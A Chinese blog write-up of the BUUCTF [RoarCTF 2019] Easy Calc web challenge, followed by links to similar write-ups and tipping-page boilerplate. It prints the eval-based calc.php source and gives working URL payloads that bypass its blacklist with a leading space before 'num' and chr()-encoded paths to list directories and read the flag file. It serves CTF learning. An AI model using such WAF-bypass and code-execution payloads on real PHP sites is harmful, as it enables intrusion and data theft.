BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解)

最新推荐文章于 2023-11-25 17:08:32 发布
最新推荐文章于 2023-11-25 17:08:32 发布
阅读量740 收藏 1
点赞数 1
文章标签: 前端 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/122569097
版权

BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解)

打开网页后是这样的。

这里先查看一下源代码

这里显示是有waf的,直接访问一下calc.php来查看。

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

这里过滤了t,r,n,等一些字符

这里的思路就是传入参数num,然后绕过过滤。

方法一:使用PHP字符串解析特性Bypass

这里的原理就是php会将在URL和正文中的查询字符串转化为内部 G E T 或 的 关 联 数 组 _GET或的关联数组 GET_POST

就是php在解析查询字符串时会

1.删除空白符

2.将某些字符转换为下划线(包括空格)

这里直接在num前加上空格绕过waf。

这里是用的%20来作为空格

这里使用两个php函数:

scandir():列出参数目录中的文件和目录
readfile():读取文件内容
利用scandir()找到flag在哪,再利用readfile()读取文件内容,从而得到flag

这里过滤的原理是

如果传参的num里出现黑名单里面的就会报错

这里用空格隔开后,就是空格加num不在num的判断黑名单中。

http://node4.buuoj.cn:28154/calc.php?%20num=1;var_dump(scandir(chr(47)))

然后利用php字符串解析特性,在解析的时候将转换为下划线。

这里找到了f1agg

这里利用file_get_contents把整个文件读入一个字符串中。

? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

这样就进行了

访问flag文件

chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

小宇特详解
关注
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 2977
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
BUUCTF[RoarCTF 2019]Easy Calc
楼阁de猫的博客
12-23 149
[RoarCTF 2019]Easy Calc 查看源码 $("#content").val(): 获取id为content的HTML标签元素的值,是JQuery, 发现有calc.php,看看有什么 这里显示了waf的过滤规则 我们上传字符发现都被过滤了,这里考察的是PHP的字符串解析特性 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符 2.将某些字符转换为下划线(包括空格) 利用这个特性,我们就可以在num前面加一个空格,然后就能绕过waf,执行
BUUCTF [RoarCTF 2019]Easy Calc
qq_53030229的博客
11-09 834
文章目录一、 [RoarCTF 2019]Easy Calc1、检查源码2、利用PHP的字符串解析绕过 一、 [RoarCTF 2019]Easy Calc 1、检查源码        1、当拿到题目时,本人以为是使用Linux命令获取flag,但是尝试之后不行        2、检查源码,发现了calc.php,打开     
buuctf [RoarCTF 2019]Easy Calc
qq_1873822的博客
03-07 381
打开题目是一个计算器 查看源码有一个 calc.php 看看题目内容,一个计算器,并且过滤了非数字的值,查看源码,上了waf,并且在calc.php显示waf的规则 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"
BUUCTF [RoarCTF 2019] Easy calc
qq_43039823的博客
07-28 248
Chr("0") 为0的字符 Chr("1") Chr("2") Chr("3") Chr("4") Chr("5") Chr("6") Chr("7") 响铃 Chr("8") 回格 Chr("9") tab(水平制表符) Chr("10") 换行 Chr("11") tab(垂直制表符) Chr("12") 换页 Chr("13") 回车 chr(13)&chr(10) 回车和换行的组合 Chr("14") Chr("15") Chr("16") Chr("17
[RoarCTF 2019]Easy Calc 1
snowlyzz的博客
03-13 3466
写给自己看 方便理解。 查看源代码 看到了URL 试试访问calc.php 尝试给num传参:发现只能传数字 而不能传字母。而我们要读取的可能就是flag这个文件 那我们可以利用PHP的字符串解析特性来绕过WAF,在num前面加上空格 绕过num传参后,我们要读取他根目录下的文件。 也就是 calc.php? num=print_r(scandir('/')); 却发现他没有返回我们想要的答案 抓包看看 发现他把 ' ' 引号给过滤掉了 那就...
[RoarCTF 2019]Easy Calc
xj28555的博客
09-02 367
进入题目是一个计算器的功能界面 查看源代码,可以发现是有WAF的,且存在一个calc.php文件 这里接收一个num参数,可以看到这里创建了一个黑名单列表,然后用正则是去匹配,进行非法参数的过滤。 那这题就是要绕过这个过滤和过一个WAF了。先传入一个?num=1测试一下。 传入字母就会报错,这里应该是被WAF文件给拦截了。 要对这WAF进行绕过,这里就涉及到一个知识点了。 PHP的字符串解析特性 我们知道PHP将查询字符串(在URL或正文中)转换
buuctf_[RoarCTF 2019]Easy Calc
weixin_46107179的博客
08-01 170
叫我们输入表达式,我们随便输入点数据,然后再答案中显示出来,感觉看不出啥来,查看源码 发现.ajax;.ajax是指通过http请求加载远程数据。然后后面发现一个calc.php后面传入一个num参数;尝试看一下这个calc.php页面 发现过滤了一些字符,如果能绕过,就可以用eval执行任意PHP代码;在正则表达式中对每一个黑名单来连接字符串;/m表示多行查找 /i (忽略大小写) /g (全文查找出现的所有匹配字符) /m (多行查找) /gi(全文查找、忽略大小写) /ig(全文查找、忽略大小写) 这
BUUCTF:[RoarCTF 2019]Easy Calc
末初的CSDN博客
10-19 1238
题目地址:https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc 查看源码 抓包发现calc.php 访问http://node3.buuoj.cn:28908/calc.php 很明显,代码执行绕过,前面源码也说了有WAF,这里绕过WAF有两种方法 在num前添加%20绕过对num的检测 HTTP走私之重复Content-Length绕过 首先看下phpinfo(),禁用了一大堆函数 使用scandir()函数+chr()函数绕过.
BUUCTF-web-[RoarCTF 2019]Easy Calc
weixin_44866139的博客
05-15 653
有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 进入题目是一个计算器,只能输入正常的数学计算式,字母什么的都输入不了,回显计算不出来,查看源码,发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num'];
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc
weixin_44622228的博客
04-17 406
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc 进入靶场,发现只有一个计算器的页面, 输入1+2看看,返回了答案3 常规想法,输入单引号试试,弹出了一个窗口 经过多个字符测试,发现都会导致弹窗,这时候我们看看F12看看, 有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 注释下还有一段js代码,通过代码可以发现还有个calc.php页面,于是...
Buuctf Easy Calc
Dexret的博客
12-07 452
打开该靶机,发现为一个计算器 尝试写一个xss的payload测试一下 再尝试一下SQL注入 两次尝试都不行,该网页应该存在waf,查看该网页的源代码 发现有一个网页,访问一下该网页 发现为网页所过滤的一些规则,而且该网页应该是由calc.php对其进行传参 尝试看一下该网页有没有phpinfo页面 报了个403的错误,服务器上文件或目录拒绝访问 应该存在waf,尝试绕过一下waf,这里有两种绕过waf的方法 在num前添加%20(空格)绕过对num的检测 HTTP
BUUCTF__[RoarCTF 2019]Easy Calc_题解
风过江南乱的博客
05-11 1048
一、看题 拿到题目 输入发现会显示简单的计算。 想到是不是ssti模板注入。 尝试{{1+1}}报错,行不通。 F12查看源码。发现存在WAF,访问 calc.php 。 尝试访问得到源代码。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r'
BUU WEB [RoarCTF 2019]Easy Calc
star_feather的博客
01-26 275
打开网址,发现只有一个计算器,正常的计算是没有问题的,但一输入字符就会报错,查看源代码也没有任何收获,然后抓包瞅瞅,有意外收获: 得到了传参方式GET:/calc.php?num=1,还有一个文件calc.php,那就去看看吧: 这段代码交代出过滤了很多东西。 然后…我就抓瞎了,因为num不能传字符(运算符除外),就没法传进去命令参数什么的,再然后我就去找了题解,大佬们分享,这道题是出题人对PHP字符串解析漏洞的理解,需要了解一些前置知识: 我们知道PHP将查询字符串(在URL或正文中)转换为内部GET
BUUCTF——EasyCalc1
最新发布
weixin_62248541的博客
11-25 225
BUUCTF——EasyCalc1
BUUCTF-Easy Calc
m0_62094846的博客
12-19 373
一个计算的工具 查看源代码,有WAF 还有url calc.php 输入数字可以,但是输入字母就会出问题 加了空格就可以成功 试过ls,不行 用scandir()函数读取文件夹里的文件,再输入print_r(print printf也可以)输出 print_r PHP中的打印函数 PHP打印输出函数汇总-php教程-PHP中文网 scandir() 函数返回指定目录中的文件和目录的数组 但是/被过滤了,用url编码也读不出来,就试着<chr...
BUUCTF_[RoarCTF 2019]Easy_Calc
qq_45628145的博客
05-01 1322
Easy Calc 进入题目是一个计算器,只能输入正常的数学计算式,字母什么的都输入不了,回显计算不出来,查看源码,发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php。 这个代码是先进行一个黑名单判断,然后执行eval()。 过滤了很多字符,而且不能输入num不能是字母,所以我们用%20num进行绕过,利用的是php的字符串解析特性,构...
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值